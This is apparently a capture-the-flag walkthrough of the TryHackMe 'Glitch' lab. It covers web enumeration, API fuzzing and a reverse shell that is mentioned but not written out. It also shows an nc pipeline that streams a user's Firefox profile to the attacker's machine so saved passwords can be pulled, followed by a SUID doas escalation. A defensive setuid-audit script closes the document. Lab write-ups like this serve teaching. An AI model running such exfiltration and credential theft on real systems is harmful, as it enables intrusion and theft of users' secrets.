GLITCH

Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?

Lab Setup

mkdir ~/Documents/tryhackme/glitch
cd ~/Documents/tryhackme/glitch
mkdir recon enumeration notes
touch notes/{README.md,vuln,creds}

export IP=10.10.29.23

Enumeration

First, scan the machine for open ports using RustScan. It's faster than Nmap, so I prefer using it exclusively for now.

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -A -T4 -oN recon/rustscan.init

Looks like only the HTTP port is open. Let's open it in the browser and see what's there. Nothing interesting, so I run feroxbuster to fuzz for files and directories. I also run nikto in the background, because it will take a while.

nikto --host http://$IP -C all -o enumeration/nikto.txt
feroxbuster -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/common.txt -o enumeration/feroxbuster

I discovered an interesting path, /api/acces. When I access it, I find a token with a base64-encoded value.

echo 'dGhpc19pc19ub3RfcmVhbA==' | base64 -d

Replace the token value with the decoded string. Let's fuzz once more with the cookie set accordingly.

feroxbuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://$IP -b 'token=this_is_not_real'

After conducting another round of fuzzing for files and directories, I examine the JavaScript code located at /js/script.js.

I find another interesting path, /api/items. After a while I get a useful response by changing the request method.

At this stage I hit a temporary dead end. After a while I fuzzed for parameters, looking for responses with a 500 status code.

Now all I need to do is to get a reverse shell.

We get a shell as user, and in the home directory we find the user.txt flag. In the same directory I find a .firefox directory, and again I was stuck for a while.

Privilege Escalation

Transfer the directory to my machine and analyze it.

# on the target: pack the profile and stream it to my machine
tar czf - .firefox | nc $my_IP 4747
# on my machine: receive the stream and unpack it
nc -lnvp 4747 | tar xvfz -

mv .firefox firefox

This took me a long time, but I finally got the answer by opening Firefox with this profile and searching the saved passwords.

Privilege escalation follows the usual steps. After some time I discovered that the "doas" binary has the SUID bit set. Change the user to v0id and run doas.

find / -type f -perm -u=s 2>/dev/null
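From the defender's side, the same find command is useful as a periodic audit: the set of setuid files on a host should be small and known, and any file that appears outside a recorded baseline (an unexpected setuid doas, for instance, or a setuid bit added to a binary during a compromise) deserves a look. The script below is an added example and is not part of the original writeup; the suid_audit and make_demo function names, the baseline file format (one absolute path per line) and the demo tree it builds are all my own constructions.

```shell
#!/bin/sh
# Added example (not from the writeup): report setuid files that are not on a known-good baseline.
#
# suid_audit ROOT BASELINE
#   ROOT      directory tree to search (use / on a real host)
#   BASELINE  text file, one absolute path per line, listing the setuid files you expect
# Prints one "UNEXPECTED SUID: <path>" line per unlisted setuid file and returns 1 if any
# were found, 0 otherwise, so it can drive a cron job or a monitoring check.
suid_audit() {
    root="$1"
    baseline="$2"
    # Same search the walkthrough uses, restricted to ROOT and sorted for stable output.
    # The loop runs in a subshell because of the pipe, so its findings are collected via $(...)
    # rather than a counter variable.
    found=$(find "$root" -type f -perm -u=s 2>/dev/null | sort | while IFS= read -r path; do
        # -F fixed string, -x whole line, -q quiet: exact path match against the baseline
        grep -Fxq -- "$path" "$baseline" || printf 'UNEXPECTED SUID: %s\n' "$path"
    done)
    if [ -n "$found" ]; then
        printf '%s\n' "$found"
        return 1
    fi
    return 0
}

# Build a constructed demo tree in a temp directory and print its path:
#   bin/ping      setuid, listed in the baseline  (expected)
#   usr/bin/doas  setuid, NOT in the baseline     (the situation from the writeup)
#   usr/bin/ls    no setuid bit                   (ignored by the audit)
make_demo() {
    dir=$(mktemp -d)
    mkdir -p "$dir/bin" "$dir/usr/bin"
    : > "$dir/bin/ping";     chmod 4755 "$dir/bin/ping"
    : > "$dir/usr/bin/doas"; chmod 4755 "$dir/usr/bin/doas"
    : > "$dir/usr/bin/ls";   chmod 0755 "$dir/usr/bin/ls"
    printf '%s\n' "$dir/bin/ping" > "$dir/baseline.txt"
    printf '%s\n' "$dir"
}
```

On a real host you would generate the baseline once from a freshly built system (find / -type f -perm -u=s 2>/dev/null | sort > /etc/suid-baseline.txt, an assumed path) and then run suid_audit / /etc/suid-baseline.txt on a schedule; a non-zero exit is the signal that the setuid inventory changed and should be reviewed.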
